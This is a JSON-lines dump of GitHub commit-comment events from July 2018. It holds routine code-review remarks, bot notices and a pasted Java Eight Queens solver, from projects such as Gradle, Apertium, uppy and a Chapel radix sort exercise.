{"id":"8005205816","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803157,"position":2,"line":2,"path":"scripts/prepare_tasks/task_transitions/1.1to2.1.py","commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T17:02:28Z","updated_at":"2018-07-23T17:02:28Z","author_association":"MEMBER","body":"write a header to this code that says the format of the input file and the format of the output file"}},"created_at":"2018-07-23T17:02:28Z"}
{"id":"8005207414","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29803158,"position":null,"line":null,"path":null,"commit_id":"5849a63955793149f9114009f4b46321c2776bf2","created_at":"2018-07-23T17:02:46Z","updated_at":"2018-07-23T17:02:46Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-936](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-936).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-936-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T17:02:46Z"}
{"id":"8005208001","type":"CommitCommentEvent","actor":{"login":"LouisJenkinsCS"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803159,"position":6,"line":6,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:02:53Z","updated_at":"2018-07-23T17:02:53Z","author_association":"NONE","body":"The range `0..256` creates 257 buckets. You can change this to use `0..#256` instead which will handle this for you."}},"created_at":"2018-07-23T17:02:53Z"}
{"id":"8005210238","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803165,"position":5,"line":16,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T17:03:18Z","updated_at":"2018-07-23T17:03:18Z","author_association":"MEMBER","body":"Fixed the link color on small screens, but the ToC is tougher as that's generated by Asciidoc. I could use CSS trickery for it, but I'd rather not. WDYT?"}},"created_at":"2018-07-23T17:03:18Z"}
{"id":"8005210714","type":"CommitCommentEvent","actor":{"login":"magic1215"},"repo":{"name":"OpenIV-Team/OpenIV-Languages"},"payload":{"comment":{"id":29803166,"position":13,"line":22,"path":"OpenIV/Resources/Languages/es_ES/Tools/RenderUI.Common.xml","commit_id":"485208b67c549488567b962d44f880fe0054c58e","created_at":"2018-07-23T17:03:24Z","updated_at":"2018-07-23T17:03:24Z","author_association":"NONE","body":"Vi "}},"created_at":"2018-07-23T17:03:24Z"}
{"id":"8005210985","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29803167,"position":4,"line":17,"path":"Testscripts/Linux/BVT-RELOAD-MODULES.sh","commit_id":"30f02e84f50daf8aeea5f7eaf867ea9a01846394","created_at":"2018-07-23T17:03:28Z","updated_at":"2018-07-23T17:03:28Z","author_association":"COLLABORATOR","body":"No. This is not what I meant. dos2unix.exe is one of binary files. We keep them in repo and continue getting warning message. I plan to use Azure blob. As I said in previous comment, here is the working blob location. \r\nhttps://partnerpipelineshare.blob.core.windows.net/binarytools/dos2unix.exe\r\nSubscriptionUsageTopVMs.ps1 may give you sample code lines regarding how to access.\r\n\r\nSimple deletion will cause the run-time error"}},"created_at":"2018-07-23T17:03:28Z"}
{"id":"8005215963","type":"CommitCommentEvent","actor":{"login":"n2ygk"},"repo":{"name":"django-json-api/django-rest-framework-json-api"},"payload":{"comment":{"id":29803177,"position":null,"line":null,"path":null,"commit_id":"e33df0a9ced47f35038f41b4f726aac999b2304b","created_at":"2018-07-23T17:04:25Z","updated_at":"2018-07-23T17:04:25Z","author_association":"CONTRIBUTOR","body":"Looks like this solves #432's sorting requirement although it silently ignores invalid fields instead of raising an error. I wonder if it's worth being more user-friendly."}},"created_at":"2018-07-23T17:04:25Z"}
{"id":"8005216505","type":"CommitCommentEvent","actor":{"login":"magic1215"},"repo":{"name":"OpenIV-Team/OpenIV-Languages"},"payload":{"comment":{"id":29803178,"position":11,"line":20,"path":"OpenIV/Resources/Languages/es_ES/Tools/RenderUI.Common.xml","commit_id":"485208b67c549488567b962d44f880fe0054c58e","created_at":"2018-07-23T17:04:31Z","updated_at":"2018-07-23T17:04:31Z","author_association":"NONE","body":"-<?xml version=\"1.0\" encoding=\"UTF-8\"?>"}},"created_at":"2018-07-23T17:04:31Z"}
{"id":"8005220765","type":"CommitCommentEvent","actor":{"login":"LouisJenkinsCS"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803186,"position":12,"line":12,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:05:24Z","updated_at":"2018-07-23T17:05:24Z","author_association":"NONE","body":"While this is a valid and correct way to iterate through an array, you can instead write this: `for a in array`. This way is potentially more efficient. "}},"created_at":"2018-07-23T17:05:24Z"}
{"id":"8005223895","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29803190,"position":null,"line":null,"path":null,"commit_id":"beba942e7cc223d8c976fbd4d3270f7279367de3","created_at":"2018-07-23T17:06:01Z","updated_at":"2018-07-23T17:06:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-149](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-149).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-149-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-23T17:06:01Z"}
{"id":"8005224334","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29803191,"position":43,"line":1825,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T17:06:06Z","updated_at":"2018-07-23T17:06:06Z","author_association":"COLLABORATOR","body":"What do you mean? are you talking about كرېست?"}},"created_at":"2018-07-23T17:06:06Z"}
{"id":"8005229678","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29803198,"position":78,"line":1860,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T17:07:12Z","updated_at":"2018-07-23T17:07:12Z","author_association":"COLLABORATOR","body":"Possibly, but this is used as \"isa'nın x'leri\", so I think isa'nın müritleri wouldn't be right."}},"created_at":"2018-07-23T17:07:12Z"}
{"id":"8005230090","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/readline-feedstock"},"payload":{"comment":{"id":29803199,"position":null,"line":null,"path":null,"commit_id":"60a60f8356eeb07c8b7153d301291d85f5beea96","created_at":"2018-07-23T17:07:17Z","updated_at":"2018-07-23T17:07:17Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T17:07:17Z"}
{"id":"8005230927","type":"CommitCommentEvent","actor":{"login":"LouisJenkinsCS"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803200,"position":6,"line":6,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:07:27Z","updated_at":"2018-07-23T17:07:27Z","author_association":"NONE","body":"Although looking it over, maybe it is desired to have an additional bucket."}},"created_at":"2018-07-23T17:07:27Z"}
{"id":"8005231543","type":"CommitCommentEvent","actor":{"login":"andrewbird"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29803203,"position":null,"line":null,"path":null,"commit_id":"c672d0c68b335a3d22567ae3dd3bd50940ea51ac","created_at":"2018-07-23T17:07:35Z","updated_at":"2018-07-23T17:07:35Z","author_association":"NONE","body":"I don't think there's a PPA, if I remember correctly there's a script on github somewhere that downloads djgpp source and builds it. Instillation is done without using the package manager, which is poor of course."}},"created_at":"2018-07-23T17:07:35Z"}
{"id":"8005233223","type":"CommitCommentEvent","actor":{"login":"EthanUphoff"},"repo":{"name":"Clojure-Intro-Course/babel"},"payload":{"comment":{"id":29803206,"position":null,"line":null,"path":null,"commit_id":"2921bb93bda710097b7a17b65836ce87aee5956e","created_at":"2018-07-23T17:07:56Z","updated_at":"2018-07-23T17:07:56Z","author_association":"COLLABORATOR","body":"Thank you @sean-stockholm , I will start working on these changes right now."}},"created_at":"2018-07-23T17:07:56Z"}
{"id":"8005235428","type":"CommitCommentEvent","actor":{"login":"advancedbear"},"repo":{"name":"advancedbear/EPGStation"},"payload":{"comment":{"id":29803211,"position":null,"line":null,"path":null,"commit_id":"08ac682c2cafca2ea3e262a27700833462d42d55","created_at":"2018-07-23T17:08:24Z","updated_at":"2018-07-23T17:08:24Z","author_association":"OWNER","body":"winserのインストール追記する"}},"created_at":"2018-07-23T17:08:24Z"}
{"id":"8005238006","type":"CommitCommentEvent","actor":{"login":"krishan94"},"repo":{"name":"krishan94/Eight-Queens-Problem-Solution"},"payload":{"comment":{"id":29803214,"position":2,"line":2,"path":"README.md","commit_id":"2aa144f491bcca79495c5a3c5613c0ac381c240e","created_at":"2018-07-23T17:08:55Z","updated_at":"2018-07-23T17:08:55Z","author_association":"OWNER","body":"public class main {\r\n\r\n    /**\r\n    * @param args\r\n    */\r\n      public static void main(String[] args) {\r\n\t\r\n\t      chessboard board = new chessboard();\r\n\t      board.start();\r\n\r\n      }\r\n\r\n}"}},"created_at":"2018-07-23T17:08:55Z"}
{"id":"8005240235","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"trekhleb/javascript-algorithms"},"payload":{"comment":{"id":29803218,"position":4,"line":5,"path":"src/algorithms/string/knuth-morris-pratt/__test__/knuthMorrisPratt.test.js","commit_id":"6a3a4b8697cd79a5a0c769d5eb3239c0d2507aad","created_at":"2018-07-23T17:09:24Z","updated_at":"2018-07-23T17:09:24Z","author_association":"CONTRIBUTOR","body":"It differs from built-in `String.prototype.indexOf` behaviour. Is it expected?"}},"created_at":"2018-07-23T17:09:24Z"}
{"id":"8005244498","type":"CommitCommentEvent","actor":{"login":"krishan94"},"repo":{"name":"krishan94/Eight-Queens-Problem-Solution"},"payload":{"comment":{"id":29803222,"position":null,"line":null,"path":null,"commit_id":"2aa144f491bcca79495c5a3c5613c0ac381c240e","created_at":"2018-07-23T17:10:16Z","updated_at":"2018-07-23T17:10:16Z","author_association":"OWNER","body":"public class chessboard {\r\n\r\n\tprivate static int board[][];\r\n\tprivate int numQueens;\r\n\r\n\tpublic chessboard() {\r\n\t\tnumQueens = 0;\r\n\t\tboard = new int [8][8];\r\n\t\tfor (int j=0; j<8; j++)\r\n\t\t{\r\n\t\t\tfor(int k=0; k<8; k++)\r\n\t\t\t{\r\n\t\t\t\tboard[j][k]=0;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tpublic int getNumQueens()\r\n\t{\r\n\t\treturn numQueens;\r\n\t}\r\n\r\n\tpublic void start()\r\n\t{\r\n\t\tsolve (0);\r\n\t}\r\n\r\n\tpublic boolean solve(int numQueens)\r\n\t{\r\n\t\tif (numQueens == 8)\r\n\t\t{\r\n\t\t\tSystem.out.println(\"DONE\");\r\n\t\t\tthis.printBoard();\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\telse {\r\n\t\t\tfor(int j=0; j<8; j++)\r\n\t\t\t{\r\n\t\t\t\tfor(int k=0; k<8; k++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif (validMove(j,k) == 0) {\r\n\t\t\t\t\t\tthis.placeQeen(j, k, 0);\r\n\t\t\t\t\t\tnumQueens++;\r\n\t\t\t\t\t\tif(solve(numQueens)) {\r\n\t\t\t\t\t\treturn true;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse {\r\n\t\t\t\t\t\tthis.placeQeen(j, k, 1);\r\n\t\t\t\t\t\tnumQueens--;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn false;\r\n\t}\r\n\r\n\tpublic static int validMove(int x, int y)\r\n\t{\r\n\t\tfor(int j=0; j<8; j++)\r\n\t\t{\r\n\t\t\tif(get(x,j) == 1 )\r\n\t\t\t{\r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t\tif(get(j,y) == 1)\r\n\t\t\t{\r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t \r\n\t\t}\r\n\t\tfor (int j=0; j<8; j++)\r\n\t\t{\r\n\t\t\tif(get(x-j,y-j) == 1)\r\n\t\t\t{\r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t\tif(get(x-j,y+j) == 1)\r\n\t\t\t{\r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t\tif(get(x+j,y-j) == 1)\r\n\t\t\t{\r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t\tif(get(x+j,y+j) == 1)\r\n\t\t\t{ \r\n\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t\r\n\t\t}\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tpublic int placeQeen(int x, int y, int type)\r\n\t{\r\n\t\tif (type == 0)\r\n\t\t{\r\n\t\t\tboard[x][y]= 1;\r\n\t\t\tnumQueens++;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t\telse if (type == 1)\r\n\t\t{\r\n\t\t\tboard [x][y]= 0;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t\tSystem.out.println(\"wrong type\");\r\n\t\treturn -3;\r\n\t\r\n\t\r\n\t}\r\n\r\n\tpublic static int get(int x, int y)\r\n\t{\r\n\t\tif(x<0||y<0||x>7||y>7)\r\n\t\t{\r\n\t\t\t\r\n\t\t\treturn -1;\r\n\t\t}\r\n\t\treturn board[x][y];\r\n\t}\r\n\tpublic void printBoard()\r\n\t{\r\n\t\tfor(int j=0; j<8; j++)\r\n\t\t{\r\n\t\t\tfor (int k=0; k<8; k++)\r\n\t\t\t{\r\n\t\t\t\tSystem.out.print(this.get(j,k) + \" \");\r\n\t\t\t\r\n\t\t\t}\r\n\t\t\tSystem.out.println(\"\");\r\n\t\t}\r\n\t \r\n\t}\r\n\r\n\r\n}"}},"created_at":"2018-07-23T17:10:16Z"}
{"id":"8005245046","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803223,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T17:10:22Z","updated_at":"2018-07-23T17:10:22Z","author_association":"NONE","body":"Yes, that would happen, but again the point is that if any error occurs while attempting to parse the config, the plugin gets disabled. Which means not catching NPE or IAE means that if those exceptions occur, the plugin _may_ continue to function, as their `enabled: true` may have parsed before their malformed `makeEnchantable` item list caused an error. After all, the plugin shouldn't be running if it doesn't have any items in its configuration."}},"created_at":"2018-07-23T17:10:22Z"}
{"id":"8005249015","type":"CommitCommentEvent","actor":{"login":"Skagevang"},"repo":{"name":"kodeklubben/oppgaver"},"payload":{"comment":{"id":29803229,"position":7,"line":5,"path":"src/python/fargespill/fargespill.md","commit_id":"e34310bd19c80cc62c1ae4c99291885c1641a9c6","created_at":"2018-07-23T17:11:10Z","updated_at":"2018-07-23T17:11:10Z","author_association":"MEMBER","body":"<img width=\"302\" alt=\"skisse\" src=\"https://user-images.githubusercontent.com/11090538/43092038-1f7ac08a-8eac-11e8-8f9a-cb096af467aa.png\">\r\n\r\nBygging feiler hos meg nå"}},"created_at":"2018-07-23T17:11:10Z"}
{"id":"8005250539","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29803233,"position":88,"line":1870,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T17:11:30Z","updated_at":"2018-07-23T17:11:30Z","author_association":"COLLABORATOR","body":"My bad, I thought nejat was savior because nejat-e gheriq is cankurtaran :D"}},"created_at":"2018-07-23T17:11:30Z"}
{"id":"8005251198","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29803237,"position":null,"line":null,"path":null,"commit_id":"c672d0c68b335a3d22567ae3dd3bd50940ea51ac","created_at":"2018-07-23T17:11:38Z","updated_at":"2018-07-23T17:11:38Z","author_association":"OWNER","body":"And fedora has that for long... Hmm.\r\nI think you are making sure all the needed\r\nthinkgs are in PPA. Maybe you can take a\r\nlook into djgpp too? :)"}},"created_at":"2018-07-23T17:11:38Z"}
{"id":"8005259212","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/betfairlightweight-feedstock"},"payload":{"comment":{"id":29803251,"position":null,"line":null,"path":null,"commit_id":"1f8b08b8f1571ec3bd5567a495fe2c8cb92b3b77","created_at":"2018-07-23T17:13:15Z","updated_at":"2018-07-23T17:13:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @liampauling was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T17:13:15Z"}
{"id":"8005261558","type":"CommitCommentEvent","actor":{"login":"amarlon"},"repo":{"name":"amarlon/gestionhost"},"payload":{"comment":{"id":29803254,"position":null,"line":null,"path":null,"commit_id":"f29818c99375112c46052b8677d489b4ea899a94","created_at":"2018-07-23T17:13:44Z","updated_at":"2018-07-23T17:13:44Z","author_association":"OWNER","body":"ok c est bon"}},"created_at":"2018-07-23T17:13:44Z"}
{"id":"8005262880","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29803255,"position":null,"line":null,"path":null,"commit_id":"33cc8ec528cf364dccbf08786894d5ec93e5900c","created_at":"2018-07-23T17:14:01Z","updated_at":"2018-07-23T17:14:01Z","author_association":"COLLABORATOR","body":"👍 Not sure how I feel about testing colors though. Yes, it’s testing CSS, but color is something that can be changed rather frequently 🤔"}},"created_at":"2018-07-23T17:14:01Z"}
{"id":"8005267481","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29803262,"position":86,"line":1868,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T17:14:55Z","updated_at":"2018-07-23T17:14:55Z","author_association":"COLLABORATOR","body":"Both are used I think, it was Ferisi in the bible I read. I'll add Farisi too."}},"created_at":"2018-07-23T17:14:55Z"}
{"id":"8005267742","type":"CommitCommentEvent","actor":{"login":"alexdavies74"},"repo":{"name":"Asana/export_importer"},"payload":{"comment":{"id":29803263,"position":12,"line":25,"path":"lib/asana_export/AsanaExport.js","commit_id":"80cfdb1a09c52e19ea712d05cd49dac45db710f2","created_at":"2018-07-23T17:14:58Z","updated_at":"2018-07-23T17:14:58Z","author_association":"CONTRIBUTOR","body":"Whoops, you're right."}},"created_at":"2018-07-23T17:14:58Z"}
{"id":"8005267924","type":"CommitCommentEvent","actor":{"login":"goto-bus-stop"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29803265,"position":null,"line":null,"path":null,"commit_id":"33cc8ec528cf364dccbf08786894d5ec93e5900c","created_at":"2018-07-23T17:15:01Z","updated_at":"2018-07-23T17:15:01Z","author_association":"MEMBER","body":"fair point, it should probably be something different"}},"created_at":"2018-07-23T17:15:01Z"}
{"id":"8005274324","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29803285,"position":null,"line":null,"path":null,"commit_id":"ffc015d42b83467973afc9adb97b20100228dabf","created_at":"2018-07-23T17:16:17Z","updated_at":"2018-07-23T17:16:17Z","author_association":"OWNER","body":"Why are a and b still in text?"}},"created_at":"2018-07-23T17:16:17Z"}
{"id":"8005280660","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29803295,"position":null,"line":null,"path":null,"commit_id":"33cc8ec528cf364dccbf08786894d5ec93e5900c","created_at":"2018-07-23T17:17:35Z","updated_at":"2018-07-23T17:17:35Z","author_association":"COLLABORATOR","body":"I’ll try to update once I come up with something better, like `width: 100%` ;)"}},"created_at":"2018-07-23T17:17:35Z"}
{"id":"8005282842","type":"CommitCommentEvent","actor":{"login":"ian-bertolacci"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803300,"position":5,"line":5,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:17:58Z","updated_at":"2018-07-23T17:17:58Z","author_association":"NONE","body":"these two lines can be reduced to:\r\n```chpl\r\nvar result : [1..#array.size] int;\r\n```\r\nAs Louis mentioned below, `1..#N` create a range of size N, starting at 1."}},"created_at":"2018-07-23T17:17:58Z"}
{"id":"8005283129","type":"CommitCommentEvent","actor":{"login":"medb"},"repo":{"name":"GoogleCloudPlatform/bigdata-interop"},"payload":{"comment":{"id":29803307,"position":null,"line":null,"path":null,"commit_id":"bc8f6c6dc9aa7c5586376e830c3dbec0427fa815","created_at":"2018-07-23T17:18:01Z","updated_at":"2018-07-23T17:18:01Z","author_association":"MEMBER","body":"I don't think that we support this at the moment.\r\nCreated FR to add proxy authentication support: https://github.com/GoogleCloudPlatform/bigdata-interop/issues/115"}},"created_at":"2018-07-23T17:18:01Z"}
{"id":"8005285226","type":"CommitCommentEvent","actor":{"login":"omendez36"},"repo":{"name":"Mrluiscarlos02/tevenetJSP"},"payload":{"comment":{"id":29803313,"position":null,"line":null,"path":null,"commit_id":"3ddec7969407f708e0159283ede42e0410587e01","created_at":"2018-07-23T17:18:26Z","updated_at":"2018-07-23T17:18:26Z","author_association":"NONE","body":"kkiro\r\n"}},"created_at":"2018-07-23T17:18:26Z"}
{"id":"8005287401","type":"CommitCommentEvent","actor":{"login":"sirbrillig"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29803319,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T17:18:53Z","updated_at":"2018-07-23T17:18:53Z","author_association":"MEMBER","body":"Unfortunately I think the only repos that I am using this for at the moment are private 😓 The code is quite old, and these sniffs are intended to help clean it up. "}},"created_at":"2018-07-23T17:18:53Z"}
{"id":"8005290051","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29803328,"position":null,"line":null,"path":null,"commit_id":"d1cd17ee1d094334dccdff484b830a5a604bbe37","created_at":"2018-07-23T17:19:24Z","updated_at":"2018-07-23T17:19:24Z","author_association":"OWNER","body":" Thank you for suggestion."}},"created_at":"2018-07-23T17:19:24Z"}
{"id":"8005290779","type":"CommitCommentEvent","actor":{"login":"malvaradoLM"},"repo":{"name":"malvaradoLM/RPSuite-1.0---Copy"},"payload":{"comment":{"id":29803329,"position":null,"line":null,"path":null,"commit_id":"49764716286c7953fdfb3e754f598d65eb4f8383","created_at":"2018-07-23T17:19:33Z","updated_at":"2018-07-23T17:19:33Z","author_association":"OWNER","body":"D"}},"created_at":"2018-07-23T17:19:33Z"}
{"id":"8005295338","type":"CommitCommentEvent","actor":{"login":"shuvr000"},"repo":{"name":"shuvr000/blogg.github.io"},"payload":{"comment":{"id":29803342,"position":null,"line":null,"path":null,"commit_id":"be60d5c523a1236dd7ad6640b63c7b28baaf429a","created_at":"2018-07-23T17:20:29Z","updated_at":"2018-07-23T17:20:29Z","author_association":"OWNER","body":"will do it again"}},"created_at":"2018-07-23T17:20:29Z"}
{"id":"8005296020","type":"CommitCommentEvent","actor":{"login":"seanthaswan"},"repo":{"name":"seanthaswan/seanthaswan.github.io"},"payload":{"comment":{"id":29803344,"position":70,"line":70,"path":"about.html","commit_id":"f0948fbbc92821d23aa7d20f8b6043f19fcd7181","created_at":"2018-07-23T17:20:38Z","updated_at":"2018-07-23T17:20:38Z","author_association":"OWNER","body":"Ahh, keen eye. Thanks!"}},"created_at":"2018-07-23T17:20:38Z"}
{"id":"8005296102","type":"CommitCommentEvent","actor":{"login":"MsCrystal1"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29803346,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-23T17:20:39Z","updated_at":"2018-07-23T17:20:39Z","author_association":"NONE","body":"I had the same issue as a windows user it appears when running the program you don't have to call python. You just need to change your directory to the folder where the file is stored. Once you've completed this step simply type Calc.py and then press enter you should get your desired results."}},"created_at":"2018-07-23T17:20:39Z"}
{"id":"8005296642","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29803348,"position":null,"line":null,"path":null,"commit_id":"ffc015d42b83467973afc9adb97b20100228dabf","created_at":"2018-07-23T17:20:45Z","updated_at":"2018-07-23T17:20:45Z","author_association":"COLLABORATOR","body":"Sorry about that: c2adfb429ac62f5be5a3da82f92589cd290d54b9"}},"created_at":"2018-07-23T17:20:45Z"}
{"id":"8005301719","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29803357,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T17:21:44Z","updated_at":"2018-07-23T17:21:44Z","author_association":"NONE","body":"Maybe just stop this run? I mean what goal it achieves now when it's already corrupted by enormous amount of crashes and time losses while analogical run w/o them is running in parralel? It's just a waste of resources, imho."}},"created_at":"2018-07-23T17:21:44Z"}
{"id":"8005306323","type":"CommitCommentEvent","actor":{"login":"drbyte"},"repo":{"name":"zencart/zencart"},"payload":{"comment":{"id":29803361,"position":null,"line":null,"path":null,"commit_id":"b970f7ad34a429bfc0e399a5cfb00a8833323603","created_at":"2018-07-23T17:22:39Z","updated_at":"2018-07-23T17:22:39Z","author_association":"MEMBER","body":"Good catch. \r\n\r\nI was considering a number of other things when reviewing this PR, knowing there would be future tweaks necessary. Thanks for catching these."}},"created_at":"2018-07-23T17:22:39Z"}
{"id":"8005306674","type":"CommitCommentEvent","actor":{"login":"designauk"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29803364,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T17:22:43Z","updated_at":"2018-07-23T17:22:43Z","author_association":"NONE","body":"Excellent idea."}},"created_at":"2018-07-23T17:22:43Z"}
{"id":"8005306700","type":"CommitCommentEvent","actor":{"login":"sschmidTU"},"repo":{"name":"opensheetmusicdisplay/opensheetmusicdisplay"},"payload":{"comment":{"id":29803366,"position":null,"line":null,"path":null,"commit_id":"0d620c8012e96e990ef15f32b0e78206f463249b","created_at":"2018-07-23T17:22:44Z","updated_at":"2018-07-23T17:22:44Z","author_association":"CONTRIBUTOR","body":"includes some temporary fixes like the measure width \"* 2\" to test lyrics spacing."}},"created_at":"2018-07-23T17:22:44Z"}
{"id":"8005309279","type":"CommitCommentEvent","actor":{"login":"ben-albrecht"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803369,"position":6,"line":6,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:23:15Z","updated_at":"2018-07-23T17:23:15Z","author_association":"NONE","body":"Does this array need to be 0-based? If given the option, I tend to prefer 1-based when possible (to avoid mistakes like these)"}},"created_at":"2018-07-23T17:23:15Z"}
{"id":"8005340053","type":"CommitCommentEvent","actor":{"login":"pd3"},"repo":{"name":"samtools/bcftools"},"payload":{"comment":{"id":29803423,"position":null,"line":null,"path":null,"commit_id":"8c1f50fa330915fd4d59ac1a61f52b75ae4febfe","created_at":"2018-07-23T17:29:22Z","updated_at":"2018-07-23T17:29:22Z","author_association":"MEMBER","body":"Forgot to comment in the commit message that this commit depends on this pull request https://github.com/samtools/htslib/pull/741."}},"created_at":"2018-07-23T17:29:22Z"}
